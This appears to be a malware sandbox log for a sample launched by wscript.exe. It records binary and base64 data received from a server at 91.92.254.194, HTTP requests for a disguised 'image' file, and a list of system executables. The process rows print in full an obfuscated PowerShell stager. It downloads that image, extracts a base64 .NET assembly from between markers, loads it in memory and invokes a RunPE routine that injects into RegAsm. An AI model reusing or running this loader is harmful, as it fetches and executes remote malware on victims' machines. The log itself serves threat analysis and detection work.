Data received | u«:+rü-^ùôqâzM«¢Àáú÷ãà, ê,_ç.¡C´3#,«ðÃÜeôH( ®pÄâvª÷ÿ \b²d U} õßúãSy#bÇf®?ZÅ+ AÀ¼ öÆÊÀB}(2¥kô¬ÄÕé}Gõçnö þ2µ:{'¦§¦bϬGâávVSv{)´|ò>+¢ö¤Óÿ `{o³µ=NWOâ eêî3èZOÚÙíL&O¾,d.æ Ågç¤qÝpRÄëàßìßhÿ jþ§ £ðËÔHGâªPsãþ3ö]ã3´XÑo%²¤Þ9¼¨pHizç¨û=öZ]dªò)ÛwÈÀ_À>Ïͬ] >tÚetÒx|z-:¢(2¸³ÎgÊÜj³B~ù7|gaÀ±Ù}¹üµ`|3>`s̵C¾.è$áe>Ý°.Yc R¢XüGùá!m±ñ7Ó;s@G- »ºî;p.M·Ã(ë}9Ë?g*MuÀ«¶Åü'xåH9!Û4FsÅ`AÜ+( í-¹«._jÐçÅë8Z¨©ÝóÎr2¨ß¶^@± 5¹l´Ò¡!²ÃúØ÷x¥Vëý0±»£7¹î'¨¶¥XÑ=0B ³i^¹C:«j£ØàÖ@àO8'Úɾt¾B2 G 8 DÜíÎðE¬®áTGç¼Ò9ÛY¡@ {`U¶SR×ÓÓÀ)î1WmÏ\ UçåûÌYX^ø°FÓG03¸|O¾_{áh÷Ó1 ¼áO,{×loÕxüG§! ¶&ÍvÁ>Ù\Þ,Wl´º©y*þ($R̤¬m/±ÀÀ¬ÉV~ùDUIKsønòâpÃ¥±, A6À¦Ñ·6ï-þÁùÊG¾[PÌî }B¡ Ð<ÕP¬í¹@.ÙuVn_|´±ùp«¯IMí#®³mR§èpN0Ð9 ß&-#ùêç¸ 5ê 9]b>Óu/hÌE5P8ä |
Data received | Íõ¼ý3¯ðßû]öz8µÒê Yc´ñÚÚÖÿ ¾å 7ê&MäÆøh×>©á¿°¨¼[Á´ZíOÏ¥ÔÎIbm8%ÓDÞàk~äü?ì΢o·Z³óãTbeà¤?UIÖÅuÍÿ Ú÷íW©ñ]OÙï Òi\,ÓDå^g^ªHä*±"p}°=oÚÙì_mV ÿ k |
Data received | EAAAALAAAAAAAHAAEAAAAAAAYAKQAwAAYAXAAwAAYAcAEwAAYA0wEwAAYAHgIwAAYAJgIwAAYALAI4AgoASAJZAgYAcgJ3AgYAiQIwAAYAkAI4AgYApQJ3AgoA8QJZAgoAewNZAgYA7wMwAAYADQUUBQYAJQUUBQYAPgUwAAYARQUwAAYAVgVhBQYAcwUwAAYAeAVhBQYAqwUwAAYAvQUwAAYAJAYwAAYAOwYwAAYATQZVBgYAkgYwAA4AmwanBgYAAQcwAAYABwcwAAYAGAcwAAYAJwcwAAYAegcUBQYA0AdhBQYA6QdhBQYA/QkwAAYACgowAAYAsQowAAoAGwwlDAYARgxPDAYAawwwAAoAwQwlDAoA1gwlDAYAew0wAAYAtxzXHAYA9xzXHAYAFR1ZAsMAKR0AAAYAOB1hBQYATx1hBQYAbB1hBQYAix1hBQYApB1hBQYAvR1hBQYA2B1hBQYA8x1VBgYABx5VBgYAFR5hBQ4AMh6nBgAAAAARAAAAAAABAAEAAAAQABoAIQAFAAEABAAAARAAQAABAAUAAgATAAMBAABHAAAACQAOADUAAwEAAG4AAAAJAA4AOQADAQAAjAAAAAkADgA9AAMBAAClAAAACQAOAEEAAwEAAMMAAAAJAA4ARQADAQAA3AAAAAkADgBJAAMBAADzAAAACQAOAE0AAwEAAA4BAAAJAA4AUQADAQAAKAEAAAkADgBVAAIBAABFAQAACQAOAFkACgEQAFwBAAANAA4AXQAKARAAegEAAA0AEgBdAAAAEACOAQEABQAkAF0AAAEQAJMBAAAFACUAbAATAPIBDgAxACkEDgAxADYEDgAxAEwEDgAxAF0EDgAxAHMEDgAxAIQEDgAxAJMEDgAxAKYEDgAxALgEDgA2AM0EDgAWANwElQARAOAEDgAGAAILnAEGABALnAEGAB0LLQMGACcLLQMGADALlQAGADMLpgAGAD4LpgAGAEgLpgAGAFALlQAGAFQLlQAGAFgLlQAGAGALlQAGAGgLlQAGAHYLlQAGAIQLlQAGAJQLlQAGAJwLMAMGAKgLMAMGALQLlQAGAMALlQAGAMoLlQAGANULlQATAN8LDgADAOoNlQADAA0OlQADADAOlQADAFMOlQADAHYOlQADAJkOlQADALwOlQADAN8OlQADAAIPlQADACUPlQADAEgPlQADAGsPlQADAI4PlQADALEPlQADANQPlQADAPcPlQADABoQlQADAD0QlQADAGAQlQADAIMQlQADAKYQlQADAMkQlQADAOwQlQADAA8RlQADADIRlQADAFURlQADAHgRlQADAJsRlQADAL4RlQADAOERlQADAAQSlQADACcSlQADAEoSlQADAG0SlQADAJASlQADALMSlQADANYSlQADAPkSlQADABwTlQADAD8TlQADAGITlQADAIUTlQADAKgTlQADAMsTlQADAO4TlQADABEUlQADADQUlQADAFcUlQADAHoUlQADAJ0UlQADAMAUlQADAOMUlQADAAYVlQADACkVlQADAEwVlQADAG8VlQADAJIVlQADALUVlQADANgVlQADAPsVlQADAB4WlQADAEEWlQADAGQWlQADAIcWlQADAKoWlQADAM0WlQADAPAWlQADABMXlQADADYXlQADAFkXlQADAHwXlQATAJ8XmAMDAMIXlQADAOUXlQADAAgYlQADACsYlQADAE4YlQADAHEYlQADAJQYlQADALcYlQADANoYlQADAP0YlQADACAZlQADAEMZlQADAGYZlQADAIkZlQADAKwZlQADAM8ZlQADAPIZlQADABUalQADADgalQADAFsalQADAH4alQADAKEalQADAMQalQADAOcalQADAAoblQADAC0blQADAFAblQADAHMblQADAJYblQADALkblQADANwblQADAP8blQADACIclQARAEUcmANQIAAAAACTAMIBCgABAFQgAAAAAJ
EY2AEKAAEAXCAAAAAAkwDfAQoAAQBkIAAAAACWAAUCEQABACgjAAAAAIYYbAIjAAMAdCMAAAAAkwCxAjoAAwCEIwAAAACTAMsCOgADAJQjAAAAAJMA3gJAAAMApCMAAAAAkwAUAxEAAwC0IwAAAACTADQDUgADAMgjAAAAAJMARwMRAAMA2CMAAAAAkwBoA2AAAwDkIwAAAACTAIMDbAADAPAjAAAAAJMAogNxAAMABCQAAAAAkwDAA38AAwAYJAAAAACTANwDbAADACQkAAAAAJMAAwSMAAMAMCQAAAAAkwAWBJAAAwA4JAAAAACWAPMEmAADAFAmAAAAAJYACAVsAAUAoCcAAAAAlgBPBWwABgCQKQAAAACWAIYF2wAHAAAAAACAAJEg0wX8AA4AAAAAAIAAkSDuBQIBDwAQLQAAAACRAAYGCQERAEgtAAAAAJEA9wY/ARMAgDsAAAAAhhhsAiMAGgDMOwAAAACRGNgBCgAaALg9AAAAAJMAQQeMABoAxD0AAAAAkwBUB9EBGgDMPQAAAACTAGcH1gEaANw9AAAAAJMAmwdgABoA6D0AAAAAkwC9B2AAGgD0PQAAAACTAPcHUgAaAAg+AAAAAJMAEQj4ARoAFD4AAAAAkwAyCFIAGgAoPgAAAACTAEUIGQEaADQ+AAAAAJMAWAj9ARoAQD4AAAAAkwByCAMCGgBMPgAAAACTAJAIDAIaAFw+AAAAAJMAowiRARoAZD4AAAAAkwC2CBICGgB4PgAAAACTANAIEgIbAIw+AAAAAJMA4wgZAhwAoD4AAAAAkwAKCSACHgDAPgAAAACTAEAJKgIjANA+AAAAAJMAWwk3AiMA3D4AAAAAkwB3CRICIwDwPgAAAACTAIoJEgIkAAQ/AAAAAJMAnQlCAiUAFD8AAAAAkwCwCTcCJgAgPwAAAACTANIJbAAmAAAAAAADAIYYbAKxACYAAAAAAAMAxgEKCE4CKAAAAAAAAwDGAfEJUwIpAAAAAAADAMYBIQpeAiwAAAAAAAMAhhhsArEALQAAAAAAAwDGAQoIZQIvAAAAAAADAMYB8QlsAjEAAAAAAAMAxgEhCnkCNQAAAAAAAw |
Data received | T ªíSÅÀâÚåÙ3¸ßBÜÎ}<Èhîã\ Wðí³BHOÞ½*ux/2u?f]!=+ÊÎBî^6:ßRHÍ°;+ç?ëéuzí8/¡Wª2ß&ÏJ<ýp2¼ nÄð)÷£wUϯé|ZIôJ%hö²¼Ð6 gË¥y{,Çi%{{V{³<ÌcÒêc@Qgó¯åêàÕT+庺°aaèAøæ«jÕ5:e[Ä2·á<uç¾Ù¨²Ã§H¤UÚYNÂ6óÁ¿1¤UµnZÈàû|O~GljmãmÔ`åÕQ|mès<ê1QÅ pOªQ¤TU¢NãÀ®üfmKøf§a&µ#ñpsó¾®5û¬òï£Ùõïû] & £wde&þþ¿®|W,oáò!p®¬ {àbl n1Ý3»D9³|y¸à1e¦-^râ2ÊmE¬¨5;è©Ô$ADYN<µXöZ<WL¾âþc8àô:Ö\¾ÄÎùàB&àVl#ª-T Ä)µ%vQè=¯¾2\m, ðr:}qµrR~3ÐÖÚ<÷ÆDkÒFV7U}$cºö¿¶:tÓ<Q<`3I·Óé/¡Úw6949ù]ðé&5fShÌ~EIü? ]jiãÓÞÕ·3qék;x±føºäñÒ:1UônfÚY÷"¨P:òóÓÎ"ûÉØhÛWp<¹[qm¯´µí?Í?®ÖÅ<k{v¨V{¬ <Wÿ |è?\]&0ȱ±Xî2;(b^)¯Ó$ªãÂ]TZæ1ªcÇ#¦Oâ $²¤VøÚM!;Oá¬2ͧ×/RÚ8£l}ðÖËÂH>-²Ç©î2uz)4úÔ´wÃW\*`tïd c ËyrÚ ÑàU':¢Á$_éðý襤nü9 ¤5X+ÀKY¢ÒóY\4 Æf¤ú^&þl0ÍçØÑ*8<ýÐK½HSÐQÁ7YüÍ3ü&ÁS\p)3Êà vçÚ'r¡Ê:äù/±ÑÕ×>ø2ùÊÈHP£¯scb¹±.F¯¨Á$e% °*z® *IM±J .¯ÕD Ù 7Ᾰ}##H m¶l6¥Òfm"ºà¼7LñyF»¯ü0jxÖ· Ù+¸úcb$gT2ícÒ*ï^8ÕTu¿jÀè`ó¢©g7Ï£Åü±B)(£pjq5± µW =²Vz-~¢EÀÐETDíÛ¾fO¨BÎ5nººçVÞö ñW|RmÌ\LÔIíTUT±VïlD#vÖ¯â aâT@©v@«÷Îbâè©^}¨E.Þ/¹ÍbñíUµ4lSHªC(#hç'FÑI Æûo|$vdì¤^bÓÀåå$éÅbmb» Ìxq6äa¾¯B&vQD ¸Å 2~#5¤³'âKãÔí$ÜO@p3ë:±¨ôþl[¢;à¤Q»é<Ë*H"ÊÖVue¨ß?<¼jOE'é>¢Ir.át(H'l¥`YÈ,JÆV³«'È»Ü-Õá*¤À Ùúaô˽É, íY£0Ë°úã:Wvu ÿ ¶mC»m`¬Êh s««ìk ÛRÉÚC®»ãè06f@ÆÑ?\ÏE*áð¨ o?ÒS®Ô/ åËDÖ 04Õáã$ bÁXÐ=f4Ë@]0ê$.P°0q6¢BÔ@ s°`A$qf«ÃÌIf&¨ñðÎwR5°À<Z©<ÒÏÅÜò1¨¹iTÐøpU-êøwÇbZ(á[dÆÓÄ]#e6yïó«iÔ%@º§#ê»è£`^ÓÊv©<^ø5)*òAàbí©DpÀfcÈùey¤!²:qÛ.È${úüº:Åy<¶;Y{ø¾X¶´7mç¿Ç%Í-,?±C6 |
Data received | ÁK0 ³£>áíæ6Ã(ùyb} nªßV<`Æ´]<J"6 m¥]Ö±iXÔP4}^ª?%òÎÇü=¸¯×ñ9ZyeÓP¹$üEÕðs+q? 6~ ÖáãúåSÖÃPñпO¶i<ãN&12ÄÂÃv£ÆQT)wñÏIáúBÆ|¢.$í}*L pÊçpóÚ§¹;¿¦=tðÕ_/ÍDÚJ°k#çéïÆÏÓ¶¢$)·qcf/Å]mö®ÿ Ë.ºªXw9!v<íÇNº$E(Þb1@ëêtÖÔj5*á:²G¶Ëà¾8$ý04uîP¤&¢zIÏ.¥*ý(Ì+ÜGê{=§ÂõwÍCµ÷ϧÉnGãóB0-©«r]«SVí×<Öyo¶þ!! õ=ó£K£aIqÚÔt¿óg6¶Î¨$©ÚyîyRù¾k)$HeP Q$}úd.N" Ú¥@KD£¿\Ób)¿1ÅI ¡úç6¬û0( &<ûÖ~ò<á%0¤UZ Ã,Å'^ÐzuøqÆ0³[VɯaùáÂX³(Ëü>®A#~=ð-¤ xý@ß c·=Fï7l«ºº ôL$«êw§VUDÿ ºoóÅôHC<6ö(ÈGfºù°a) ÜxoqYwJä²±P,åÃúeÎJB{ÎâçµPa_Bp~R{nÝÀíäïo=2b´Òµ´;|¨Q©M(ü@aïhî,æZ!zî8ù^F=ó;M+x>ãÛ~ðHÅcëí·ü8ö¢eÓB4Î%f@&º¨þ+÷é¢Ë4 ¹ÛÁ¸êzÝeuÈú!%w**hq@| ÀïHÂ4!yÏOQ þY'Tû·ÔÈhÕÙýo(«Ð$rÀn£ß.°«:¬r¸×©j:ûàwÃT²°bUúºßd¬h üÿ ¾10VÔÞpí㪠úÕb^;|°ðû;+B]í;lwø\ ×8y4ér úàH4íÿ /r±ã½ý/: _ÞZ<óÖtøÖ¦V`ÛÞ·-`ÿ ®PC-1;(H^?<¥pѱ5Èj£x@Þ{:Y5¸ÿ <yÜTK°m£]O7ý0qµ:]E÷Ã}Ü3!Vf íçÓÏOaÆîòÃU®åYFÖÛMê*þ@àHbMTjdY±?mócå¤%cdhÌåAæÈ =¿¡ï]{SU>N¢f%Ô.6ÙÜEõ?ûaæðæI"K+ÁxÊ«_u6wzûVºv!W«6æcwd×?Ú³GOâ'Ä'lX.àEE³D9ãÔèL ¥RÁ¤±f ñgboܾÃÞRDéûÃw`@õã ˤÓÇ ìðÍ¦× A|Æ!6 ®¦IiüÐhUO&¾8Yc-¡Ò*¬eeP8 ¬[ÕϾêãF¤H ¨ $jù`7áëçø±ó2°bÂV'>Âï0cLÆp¥Rn¨Tk4<2)4þ8²$¡!Ê/ 5} |ñöO«ÖG4bPÛd$ÉüJ¥¿ þp1õ-J±¯Ûf>Àöê3gÀüM6 uºD»Ø÷µì¿oE§ ¢ûËiM!RʺÀ ½ÝtïÔxz)Ói'ÔC$UÔ(«ÅrÏ?S.M.¬i4¤j¤´ÜBï$ÏÓéÿ r2:«K@|oS§XôPèN£ÍQë) G<I«>Øáð&ä)w@4N@r¼Y#¯ÇÐúiÖ5c´f` §Ï=/ìîuÑ}²ðI&ã8µÙÔ©?óÑM¦Èi¢¡VFÜìGR3KìDÒ'Ú¿x¿Ú0±u c"&°=OÛÿ j£_ ´³¤¡Ã]¨ñãùæí"Jàí`#®e#ÒGª+ý3Ï}¹J¿n§Iç:`ÈÈÅØh$Y»ûAñRº]~Ñj|WW * U÷æùÀÛâö3ìc»3+èÙP¥¨áZ°>òòUwµ'¸ÏyûCW³Ï°$[:iªßCå×>}H̶ \ Iw!Q¸t'F`Ut`Í\â ( ¬ ½Ök¯\ãrJ$ö{ÝéQs{¯' bM¥ ¯uaÏÏIMGuöÀ©];þÓFmF"©"¥\º¨Ù|ÐÜÀ±Lå¥BpµFBÖÁGð¡ùkø^ûäH»Pù1ìj÷ì~£#S§7Üç9g]ÇðeuùËü¿ðàHÛSÛ W%Ë5Ç3î¨Í~X}+·Ëv¬$SÒÚ÷øá¨AëíóXêJ°¼%¨VØõ´sõÀH¯¨ ß,w.ú«ÅýFK¾}òÈÎZÕ÷ºÀ~d-"° J2k:ûÞ*]A!GÇñΩÀf $¥«¨Rhc:];ùeNÞ0pñ¦áûÖ9§B³¦çù÷ÀdiÁéKbÓDë*ÖÛì0ð¼®Áç§l¡Phf8M;7m¾ã,tä>Ú_|$híå¾pÐFKlàDUºÆ¢Y®pâg6hãPe *ôÀXéʨlÐÐÆLaGQgõÉ£wEµ{3JÛ®9tìí¼RðÇßL¥õWKÂi´ãËç<A×mÑ`Eë éN¡Á¸ûeÄ'ïJk öø`&Ú6Y7"¯~#eꬼlD Ü_oÂêò4ʱ³«DÊ@ºä¶J(Eßs¡K`z°öÉ}>øXTcÞ°2ä$H*÷¿¦%& 6Ôæ²Á&áê¡u<¬Äd~X "»ª^xÎëAÈã¦mLĤè¹x´JA¾·ç9=~=²ÎÛMÇ{ïRh `D ûʱ ×^ÃÛ'U§ýädA;t¨ú_ûXCpËjôû3·5ù`aô»vÒ_Î/÷f2;lè>îF èFt»ÞZºÝØ_¾ºVF¢ß:P /uq?©xíU]0ÒÀk¤r<vãÏI§MÆqþ!0.ÑW}Æj¶E×=+ iÀSkõÀÉ0× ä ï@æéÁ5@Û8BTEqX 
ß#"¯kwËéô¢F4hß4!Ó¢*ék¦Ü1´Ñ¢U /õÀÇf@ÅZ=0Â&-fÊyþY£÷2Íܨ=ò_JØë µyü¶tH!Þ#Ü<m4ê¦Èà¼Å2]qÎDÚdYÍÛÀ߶ ôÀJ¤¥y<n®¹¥¦ ]UJ·IÃ˧gU%^xÀÈÕiÙt÷üKBý»fyÉ|õ¿u]æÆâLK[ D]ê+"°<ðûeßCé2ª<ñ¬<:?U£+X+Lç¨ÀÉJ¥² Õ`ÞhÁP»I$rsn- ê¢ZÊ3°p0åÓ4a@$.ðB+°)£×=E 9êpQiXüp1ÓB¤[i9 xõ Å}zæÒº±j±v¾7,°5É ÖH£GWkmÛ7ßs4,V")TnútýsPBh¨½²È½Á½9y!CÏJ<^-¯vJÆ |
Data received | Åüp2:î]nøÜä¶æE÷lÄ]$ôÍ]ì47ÐFgRjõªàÅÂ8óõÇ~03eðçPT#3©§§½ÜG¹È^v}óCÅgDâAv%ë}íMv®×}íQ *Ù×d×öÀFVVifº í^øD!;-w<qúÌ{á4ÐO+o Ô2Û |
Data received | reÜ@rÀ~XáÓ,IP·BÏ^ÇM@ín6r¾ÒHãA%Õ¨Ò`¥c;+Bñ¨NIê>\àt%$³8;{cÌj]r@¡Ç|¢·A+ÉÖt _r2#«ÛdS4åÉ Y'¯L$³oPñ½¨úä 0DÍVIJuúbæ7hCG¶UïbPÄmÈç¶V-Nô&ôµ}ëÛg¥!ýL¦þG:W åÃVŽð&åRJ }Åfý[8BªÃPË«Ù s^õjQc$áí-N²T\±åH åIbORo=7²Ä6aø®p+¢Ó±%O¸ÛÎç«è.Ev¾NkËá½»åÃÕ#-$jv=ð1*ùq!U H>øìð,JïÊ+Ê£åé¥E`cnÎ;à.K¯$±ß/«DTü1ÓM£ýáD#ÅdA¤Õ s¶úûq$¸ÈܹÃOy ÅåUyà,¦;£²01¢ÊâPÀÃ̺}GÒA! jä8¬Ç§½ð2#BeÜǶ«ëÍþU ¬ )QÞ³Ð:ødÁé§%Ú2¯OùrÙ|½4ªâàò!E~G8@#9Z$"î=bGè Y¡ ýèÔä(6¼ôâÏÓ=ølHÕ¥éºE$|ËuÓød$Ë¥ÔùÊÁóÕ¨ú0<ÑÓJ5. £m%= 89¿rÆ6JeàÝ=8#=LgÃ`BcÒNXöóT=êáÒÍ#Ìce,ÌJ±ßHßεAS¶ÆT¾å"ì欺8»ù{ÎI.R -ÏN½òáòF3¥&aÓ©N<` [iø¼@Ì.|2ɸ±ºúãÚ J O~Æ TOP/P¡¹` (|AËUf7zX®ÙEF¸=ñçÓF)ÅfYj sBÅà]£ ¡Õ·)$)<+ûæç éFáUd¬j¥m,Ü yâ·5ü9¥ÔǸ+iä;rÝVÔíÍo 4ú]SÈI;+DÄ0Z=04ü?O¦û³ê^}4*!,ÛHc´2¯EcDï=Hù7øWß<J´h6±RXfUw꿦9àë¼Z!§ h Ûµ÷UuܬmUWÕj¤³¶»g¿OÐÁK¤ÐysÂVäCrv_a\ð8Àù§ia0ñjVa+2ë·k ¶Aöõqßà0ì-øf×±a«]&¥ ¦%dRTøô=ÖxF·KÔè7NWÖË"±¿düO8¦£À|6mvâðé]¡e´ÔD̤ÏûcÏV7Í÷8ÓǯÅ$ OÝ÷0Rh »ºr[±ìÇæqɤÒ"¦@vÈ´Á±Èo{û5àÚ--Ò HB¤lÌ Ùè:~yáÖn1¢pcQÐÕO>ø(ÈÌ V³Òýºá7/¨Ê°tºjdz1 ª¦Îé¢V¦F Ó½ÿ )Ûß ¤ÒÇ:9w Ê8×5<I´¯¡ 4m'põÙ¬Á[¼ÙµUÛ+gmרÎ$²låÜÔ:+ ÒB¥PÞ¦$à îpòigIRÑ[Üå#R໨{XÀ¢©PX©¢2Ê°e'ñ(t;¦ ½BøÌx×ÌeD¦406|(¦²EÐjµz´!&AÜÊ%¤¨ ÁePMt'§QôÏ°>¡ðÿ Ú¯E ñÖà 6h·!e פ¶ç}GqcæáúßÖÔi³ÆÉL-Få 0£×A÷Ï¥ý_íoÁ$-0U£&D0«;DÑ%y¾}Gxö¦Oö×Æ)w»kæ/WÁ.Ö9øç`XAØÈzí³íïjíÇÍù±lÎZª1$Qö$¦yEÒM"±@Q»§Q"-1ÒÆQü5UFSe¯ãÝv0¾gÍǶO0û4Û@.Û½ÎÓè§Ôå$HçÆzVÏ |
Data received | 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 |
Data received | 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<<BASE64_END>> |
Data sent | GET /imge/new-image_v.jpg HTTP/1.1 Host: 91.92.254.194 Connection: Keep-Alive |
Data sent | GET /imge/new-image_v.jpg HTTP/1.1 Host: 91.92.254.194 |
host | 91.92.254.14 |
host | 91.92.254.194 |
parent_process | wscript.exe | martian_process | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "(('0mjlink = vbAhttp://91.92.254.194/imge'+'/new-image_v.jpgvbA; 0mjwebClient = New-Object System.Net.WebClient; try {'+' 0mjdownloadedData ='+' 0mjwebClient.DownloadData(0mjlink) } catch { Write-Host vbAFailed To download data from 0mjlinkvbA -Foreg'+'roundColor Red; exit }; if (0mjdownloadedData -ne 0mjnull)'+' { 0mjimageText = [Syst'+'em.Text.Encoding]::UTF8.GetString(0mjdow'+'nloa'+'dedDat'+'a); 0mjstartFlag = vbA<<BASE64_S'+'TART>>vbA; 0mjendFlag = vbA<<BASE64_END>>vbA; 0mjstartIndex = 0mjimageText.'+'IndexOf(0mjstartFlag); 0mjendIn'+'dex = 0mjimage'+'Text.IndexOf(0mjendFlag); if (0mjstartIndex -ge 0 -and 0mjendIndex -gt 0mjstartIndex) { 0mjstartInd'+'ex += '+'0mjstartFlag.Length; 0mjbase64Length = 0mjendIn'+'de'+'x - 0m'+'jstartIndex; 0mjbase64Command = 0mjimageText.Substring(0mjstart'+'Index, 0mjbase64Length); 0mjcommandBytes = [System.'+'Convert]::FromBase64String(0mjbase64Command); '+'0mjloadedAs'+'sembly ='+' [System.Reflection.Assembly]::'+'Load(0mjcommandBytes); 0mjtype = 0mjloadedAssembly.GetType(vbARunPE'+'.Homev'+'bA); 0mjmethod = 0mjtype.GetMethod('+'vbAVAIvbA).Invoke(0mjnull,'+' [obj'+'ect[]] (vbAtxt.HGU/990'+'55/61'+'.532.59'+'.32//:ptthvbA , vbAdesativadovbA , vbAdesativadovbA , vbAdesativadovbA,'+'vbARegAsm'+'vbA,vbAvbA)) } }Set Scriptblock 0mjlink '+'= vbAh'+'ttp://91.92'+'.254.194/imge/new-image_v.jp'+'gvbA; 0mjwebClient'+' = New-Object System.Net.WebClient; try { 0mjdownloadedData = 0mjwebClient.DownloadData(0mjlink) } catch { Write-Host'+' vbAFailed To download data'+' from 0mjlinkvbA -ForegroundColor Red; exit }; '+'if (0mjdo'+'wnloadedData -ne'+' 0mjnull) { 0mjimageText = [System.Text.Encoding]::UTF8.G'+'etString(0mj'+'downloadedDat'+'a); 0mjstartFla'+'g = vbA<<BASE64_START>>vbA'+'; 0mjendF'+'lag '+'= vbA<<BASE64_END>>vbA; 0mjstartIndex = 0mji'+'mageText.IndexOf(0mjstartFlag); 0mjendIn'+'dex = 
0mjimageText.IndexOf(0mjendFlag); if (0mjstartIndex -'+'ge 0 -and 0m'+'jendInde'+'x -gt '+'0mjstartIndex) { 0mjstartIndex += 0mjstartFlag.Length; 0mjbase64Length = 0'+'mjendIn'+'dex - 0mjstar'+'tIndex; 0mjbase64Command = 0mjimageText.Substring(0mjstartIndex, 0mjbase64Length); 0mjcommandBytes = [System.C'+'onvert]::FromBase64String(0mjbase64Command); 0mjloadedA'+'ssembly = [System.Reflection.Assembly]::Load(0mjcommandBytes);'+' 0mjtype = 0mjloadedAssembly.GetType(vbARunPE.HomevbA); 0'+'mjmethod = 0mjtype.GetMethod(vbAVAIvbA).Invoke(0mjnu'+'ll, [o'+'bject[]] (vbAtxt.HGU/99055/61.53'+'2.59.32//:p'+'tthvbA , vbAdesativadovbA , vbAdesativadovbA , vbAde'+'sativadovbA,v'+'bARegAsmvbA,vbAvbA)) } }')-rePLAcE'0mj',[cHAr]36 -rePLAcE ([cHAr]118+[cHAr]98+[cHAr]65),[cHAr]39) |& ( $pshoME[4]+$pSHOmE[34]+'X')" | ||||||
parent_process | wscript.exe | martian_process | powershell -Command "(('0mjlink = vbAhttp://91.92.254.194/imge'+'/new-image_v.jpgvbA; 0mjwebClient = New-Object System.Net.WebClient; try {'+' 0mjdownloadedData ='+' 0mjwebClient.DownloadData(0mjlink) } catch { Write-Host vbAFailed To download data from 0mjlinkvbA -Foreg'+'roundColor Red; exit }; if (0mjdownloadedData -ne 0mjnull)'+' { 0mjimageText = [Syst'+'em.Text.Encoding]::UTF8.GetString(0mjdow'+'nloa'+'dedDat'+'a); 0mjstartFlag = vbA<<BASE64_S'+'TART>>vbA; 0mjendFlag = vbA<<BASE64_END>>vbA; 0mjstartIndex = 0mjimageText.'+'IndexOf(0mjstartFlag); 0mjendIn'+'dex = 0mjimage'+'Text.IndexOf(0mjendFlag); if (0mjstartIndex -ge 0 -and 0mjendIndex -gt 0mjstartIndex) { 0mjstartInd'+'ex += '+'0mjstartFlag.Length; 0mjbase64Length = 0mjendIn'+'de'+'x - 0m'+'jstartIndex; 0mjbase64Command = 0mjimageText.Substring(0mjstart'+'Index, 0mjbase64Length); 0mjcommandBytes = [System.'+'Convert]::FromBase64String(0mjbase64Command); '+'0mjloadedAs'+'sembly ='+' [System.Reflection.Assembly]::'+'Load(0mjcommandBytes); 0mjtype = 0mjloadedAssembly.GetType(vbARunPE'+'.Homev'+'bA); 0mjmethod = 0mjtype.GetMethod('+'vbAVAIvbA).Invoke(0mjnull,'+' [obj'+'ect[]] (vbAtxt.HGU/990'+'55/61'+'.532.59'+'.32//:ptthvbA , vbAdesativadovbA , vbAdesativadovbA , vbAdesativadovbA,'+'vbARegAsm'+'vbA,vbAvbA)) } }Set Scriptblock 0mjlink '+'= vbAh'+'ttp://91.92'+'.254.194/imge/new-image_v.jp'+'gvbA; 0mjwebClient'+' = New-Object System.Net.WebClient; try { 0mjdownloadedData = 0mjwebClient.DownloadData(0mjlink) } catch { Write-Host'+' vbAFailed To download data'+' from 0mjlinkvbA -ForegroundColor Red; exit }; '+'if (0mjdo'+'wnloadedData -ne'+' 0mjnull) { 0mjimageText = [System.Text.Encoding]::UTF8.G'+'etString(0mj'+'downloadedDat'+'a); 0mjstartFla'+'g = vbA<<BASE64_START>>vbA'+'; 0mjendF'+'lag '+'= vbA<<BASE64_END>>vbA; 0mjstartIndex = 0mji'+'mageText.IndexOf(0mjstartFlag); 0mjendIn'+'dex = 0mjimageText.IndexOf(0mjendFlag); if (0mjstartIndex -'+'ge 0 -and 
0m'+'jendInde'+'x -gt '+'0mjstartIndex) { 0mjstartIndex += 0mjstartFlag.Length; 0mjbase64Length = 0'+'mjendIn'+'dex - 0mjstar'+'tIndex; 0mjbase64Command = 0mjimageText.Substring(0mjstartIndex, 0mjbase64Length); 0mjcommandBytes = [System.C'+'onvert]::FromBase64String(0mjbase64Command); 0mjloadedA'+'ssembly = [System.Reflection.Assembly]::Load(0mjcommandBytes);'+' 0mjtype = 0mjloadedAssembly.GetType(vbARunPE.HomevbA); 0'+'mjmethod = 0mjtype.GetMethod(vbAVAIvbA).Invoke(0mjnu'+'ll, [o'+'bject[]] (vbAtxt.HGU/99055/61.53'+'2.59.32//:p'+'tthvbA , vbAdesativadovbA , vbAdesativadovbA , vbAde'+'sativadovbA,v'+'bARegAsmvbA,vbAvbA)) } }')-rePLAcE'0mj',[cHAr]36 -rePLAcE ([cHAr]118+[cHAr]98+[cHAr]65),[cHAr]39) |& ( $pshoME[4]+$pSHOmE[34]+'X')" |
file | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
file | C:\Windows\System32\ie4uinit.exe |
file | C:\Program Files\Windows Sidebar\sidebar.exe |
file | C:\Windows\System32\WindowsAnytimeUpgradeUI.exe |
file | C:\Windows\System32\xpsrchvw.exe |
file | C:\Windows\System32\displayswitch.exe |
file | C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe |
file | C:\Windows\System32\mblctr.exe |
file | C:\Windows\System32\mstsc.exe |
file | C:\Windows\System32\SnippingTool.exe |
file | C:\Windows\System32\SoundRecorder.exe |
file | C:\Windows\System32\dfrgui.exe |
file | C:\Windows\System32\msinfo32.exe |
file | C:\Windows\System32\rstrui.exe |
file | C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe |
file | C:\Program Files\Windows Journal\Journal.exe |
file | C:\Windows\System32\MdSched.exe |
file | C:\Windows\System32\msconfig.exe |
file | C:\Windows\System32\recdisc.exe |
file | C:\Windows\System32\msra.exe |